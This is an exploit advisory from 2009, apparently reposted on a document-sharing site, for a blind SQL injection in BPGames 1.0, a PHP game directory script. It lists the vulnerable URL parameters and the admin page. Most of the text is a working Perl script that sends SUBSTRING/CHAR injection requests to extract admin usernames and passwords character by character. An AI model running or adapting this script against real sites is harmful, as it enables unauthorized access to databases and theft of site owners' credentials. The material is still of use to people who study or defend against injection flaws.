Get documents about "BPGames 1.0 blind SQL Injection
Document Sample
BPGames 1.0 blind SQL Injection Page 1/3
1 #[x]===================================================================[x]
2 # | AntiSecurity[dot]org |
3 #[x]===================================================================[x]
4 # | Title : BPGames 1.0 blind SQL Injection Exploit |
5 # | Software : BPGames |
6 # | Vendor : http://bpowerhouse.info |
7 # | Date : 22 September 2009 ( Indonesia ) |
8 # | Author : OoN_Boy |
9 # | Contact : oon.boy9@gmail.com |
10 # | Web : http://oonboy.info |
11 # | Blog : http://oonboy.blogspot.com |
12 #[x]===================================================================[x]
13 # | Technology : PHP |
14 # | Database : MySQL |
15 # | Version : 1.0 |
16 # | License : GNU GPL |
17 # | Price : $29.90 |
18 # | Description : is a game directory site script. The script |
19 # | supports multi−language settings. Site users |
20 # | can search for games according to categories |
21 #[x]===================================================================[x]
22 # | Google Dork : gwe ganteng :P |
23 #[x]===================================================================[x]
24 # | Exploit : http://localhost/[path]/main.php?cat_id=[sql] |
25 # | http://localhost/[path]/game.php?game_id=[sql]|
26 # | Aadmin Page : http://localhost/[path]/admin/index.php |
27 #[x]===================================================================[x]
28 # | Greetz : antisecurity.org batamhacker.or.id |
29 # | Vrs−hCk NoGe Paman zxvf Angela Zhang aJe H312Y|
30 # | yooogy mousekill }^−^{ martfella noname s4va |
31 # | k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua |
32 # | Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny|
33 #[x]===================================================================[x]
34
35
36 use HTTP::Request;
37 use LWP::UserAgent;
38
39 $cmsapp = ’BPGames’;
40 $vuln = ’main.php?cat_id=’; #change vuln game.php?game_id=
41 #vuln = ’game.php?game_id=’;
42 $string = ’Previous’; #change if any string
43 #string = ’Instrucciones’;
44 $maxlen = 32;
45
46 my $OS = "$^O";
47 if ($OS eq ’MSWin32’) { system("cls"); } else { system("clear"); }
48
49 printf "\n
50 $cmsapp
51 [x]=================================================[x]
52 | BPGames 1.0 blind SQL Injection Exploit |
OoN Boy 09/22/2009
BPGames 1.0 blind SQL Injection Page 2/3
53 [x]=================================================[x]
54
55 \n";
56
57 print " [+] URL Path : "; chomp($web=<STDIN>);
58 print " [+] Valid ID : "; chomp($id=<STDIN>);
59 print " [+] Table : "; chomp($table=<STDIN>); #table name admins
60 print " [+] Columns : "; chomp($columns=<STDIN>); #column username and password
61
62 if ($web =~ /http:\/\// ) { $target = $web."/"; } else { $target = "http://".$web."/"; }
63
64 print "\n\n [!] Exploiting $target ...\n\n";
65 &get_data;
66 print "\n\n [!] Mission completed.\n\n";
67
68 sub get_data() {
69 @columns = split(/,/, $columns);
70 foreach $column (@columns) {
71 print " [+] SELECT $column FROM $table LIMIT 0,1 ...\n";
72 syswrite(STDOUT, " [−] $table\@$column> ", 255);
73 for (my $i=1; $i<=$maxlen; $i++) {
74 my $chr = 0;
75 my $found = 0;
76 my $char = 48;
77 while (!$chr && $char<=57) {
78 if(exploit($i,$char) =~ /$string/) {
79 $chr = 1;
80 $found = 1;
81 syswrite(STDOUT,chr($char),1);
82 } else { $found = 0; }
83 $char++;
84 }
85 if(!$chr) {
86 $char = 97;
87 while(!$chr && $char<=122) {
88 if(exploit($i,$char) =~ /$string/) {
89 $chr = 1;
90 $found = 1;
91 syswrite(STDOUT,chr($char),1);
92 } else { $found = 0; }
93 $char++;
94 }
95 }
96 if (!$found) {
97 print "\n"; last;
98 }
99 }
100 }
101 }
102
103 sub exploit() {
104 my $limit = $_[0];
OoN Boy 09/22/2009
BPGames 1.0 blind SQL Injection Page 3/3
105 my $chars = $_[1];
106 my $blind = ’+AND+SUBSTRING((SELECT+’.$column.’+FROM+’.$table.’+LIMIT+0,1),’.$limit.’,1)=CHAR(’.$chars.’)’;
107 my $inject = $target.$vuln.$id.$blind;
108 my $content = get_content($inject);
109 return $content;
110 }
111
112 sub get_content() {
113 my $url = $_[0];
114 my $req = HTTP::Request−>new(GET => $url);
115 my $ua = LWP::UserAgent−>new();
116 $ua−>timeout(5);
117 my $res = $ua−>request($req);
118 if ($res−>is_error){
119 print "\n\n [!] Error, ".$res−>status_line.".\n\n";
120 exit;
121 }
122 return $res−>content;
123 }
124
125 # Exploit End
OoN Boy 09/22/2009
